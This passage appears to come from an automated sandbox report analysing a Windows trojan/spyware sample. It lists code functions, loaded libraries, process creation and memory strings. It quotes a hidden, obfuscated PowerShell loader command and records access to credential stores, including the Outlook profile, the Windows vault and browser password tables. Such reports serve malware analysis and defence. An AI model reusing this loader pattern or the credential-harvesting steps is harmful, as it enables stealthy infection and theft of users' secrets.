            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0374A8409_2_0374A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037428409_2_03742840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0376E8F09_2_0376E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037268B89_2_037268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037B4F409_2_037B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03760F309_2_03760F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037E2F309_2_037E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03782F289_2_03782F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0374CFE09_2_0374CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03732FC89_2_03732FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037BEFA09_2_037BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03740E599_2_03740E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037FEE269_2_037FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037FEEDB9_2_037FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03752E909_2_03752E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037FCE939_2_037FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037DCD1F9_2_037DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0374AD009_2_0374AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0373ADE09_2_0373ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03758DBF9_2_03758DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03740C009_2_03740C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03730CF29_2_03730CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037E0CB59_2_037E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0372D34C9_2_0372D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037F132D9_2_037F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0378739A9_2_0378739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037E12ED9_2_037E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0375B2C09_2_0375B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037452A09_2_037452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0372F1729_2_0372F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0377516C9_2_0377516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0374B1B09_2_0374B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0380B16B9_2_0380B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037F70E99_2_037F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037FF0E09_2_037FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037EF0CC9_2_037EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037470C09_2_037470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037FF7B09_2_037FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037856309_2_03785630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037F16CC9_2_037F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037F75719_2_037F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_038095C39_2_038095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037DD5B09_2_037DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037314609_2_03731460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037FF43F9_2_037FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037FFB769_2_037FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037B5BF09_2_037B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0377DBF99_2_0377DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0375FB809_2_0375FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037B3A6C9_2_037B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037FFA499_2_037FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037F7A469_2_037F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037EDAC69_2_037EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037DDAAC9_2_037DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03785AA09_2_03785AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037E1AA39_2_037E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037499509_2_03749950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0375B9509_2_0375B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037D59109_2_037D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037AD8009_2_037AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037438E09_2_037438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037FFF099_2_037FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03703FD29_2_03703FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03703FD59_2_03703FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037FFFB19_2_037FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03741F929_2_03741F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03749EB09_2_03749EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037F7D739_2_037F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037F1D5A9_2_037F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03743D409_2_03743D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0375FDC09_2_0375FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037B9C329_2_037B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037FFCF29_2_037FFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_029C1D709_2_029C1D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_029BAE509_2_029BAE50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_029BCE509_2_029BCE50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_029BAF949_2_029BAF94
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_029BAFA09_2_029BAFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_029BCC309_2_029BCC30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_029BCC279_2_029BCC27
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_029B11B29_2_029B11B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_029C36309_2_029C3630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_029C54309_2_029C5430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_029DBB209_2_029DBB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0360E3069_2_0360E306
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0360E3099_2_0360E309
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0360E7BC9_2_0360E7BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0360E4249_2_0360E424
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0360CB239_2_0360CB23
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0360E93C9_2_0360E93C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0360D8889_2_0360D888
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03787E54 appears 111 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 037BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03775130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0372B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 037AEA12 appears 86 times
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: String function: 1F79B970 appears 275 times
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: String function: 1F7E5130 appears 58 times
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: String function: 1F7F7E54 appears 110 times
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: String function: 1F82F290 appears 105 times
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: String function: 1F81EA12 appears 86 times
            Source: Forhandlingsfriheden.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/14@2/3
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeCode function: 0_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040351C
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeCode function: 0_2_004049B1 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004049B1
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeCode function: 0_2_004021CF CoCreateInstance,0_2_004021CF
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2532:120:WilError_03
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeFile created: C:\Users\user\AppData\Local\Temp\nspF7FB.tmpJump to behavior
            Source: Forhandlingsfriheden.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: svchost.exe, 00000009.00000003.3217305279.0000000003070000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.3217419528.0000000003073000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.3219469350.00000000030A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.3360182038.0000000003073000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.3360608620.00000000030CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeFile read: C:\Users\user\Desktop\Forhandlingsfriheden.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Forhandlingsfriheden.exe "C:\Users\user\Desktop\Forhandlingsfriheden.exe"
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Vibss=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Bionomic\bambusmbler.gud';$Kunstvrkets=$Vibss.SubString(75330,3);.$Kunstvrkets($Vibss)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe "C:\Users\user\AppData\Local\Temp\Opfattelsers.exe"
            Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\SysWOW64\svchost.exe"
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Vibss=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Bionomic\bambusmbler.gud';$Kunstvrkets=$Vibss.SubString(75330,3);.$Kunstvrkets($Vibss)Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe "C:\Users\user\AppData\Local\Temp\Opfattelsers.exe"Jump to behavior
            Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\SysWOW64\svchost.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Forhandlingsfriheden.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: mshtml.pdb source: Opfattelsers.exe, 00000006.00000001.2794074840.0000000000649000.00000020.00000001.01000000.00000008.sdmp
            Source: Binary string: CallSite.Targetore.pdbs source: powershell.exe, 00000002.00000002.2794477893.0000000000638000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: PxuyeSuijNdsM.exe, 00000008.00000002.3359525503.000000000038E000.00000002.00000001.01000000.00000009.sdmp
